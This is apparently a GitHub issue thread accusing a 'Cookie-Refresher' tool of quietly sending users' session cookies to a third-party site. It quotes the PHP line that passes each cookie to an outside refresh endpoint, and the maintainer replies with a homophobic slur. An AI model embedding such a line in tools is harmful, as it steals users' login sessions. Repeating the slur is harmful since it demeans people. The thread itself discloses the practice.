### ISSUE TITLE
Nice dualhook shit

### ISSUE THREAD

**Issue by AdamxzV3** [hittaz/Cookie-Refresher#1]
$endpoint = "https://ctjs.site/refresh.php?cookie=" . urlencode($cookie);
goes to specific site to refresh it, provide opensource code before duallhooking shit

**Comment by hittaz** [comment]
thats crazy I def left a endpoint on accident. it was on purposes faggot for kids that want to host their own cookie refresher

**Comment by AdamxzV3** [comment]
yeah thats you
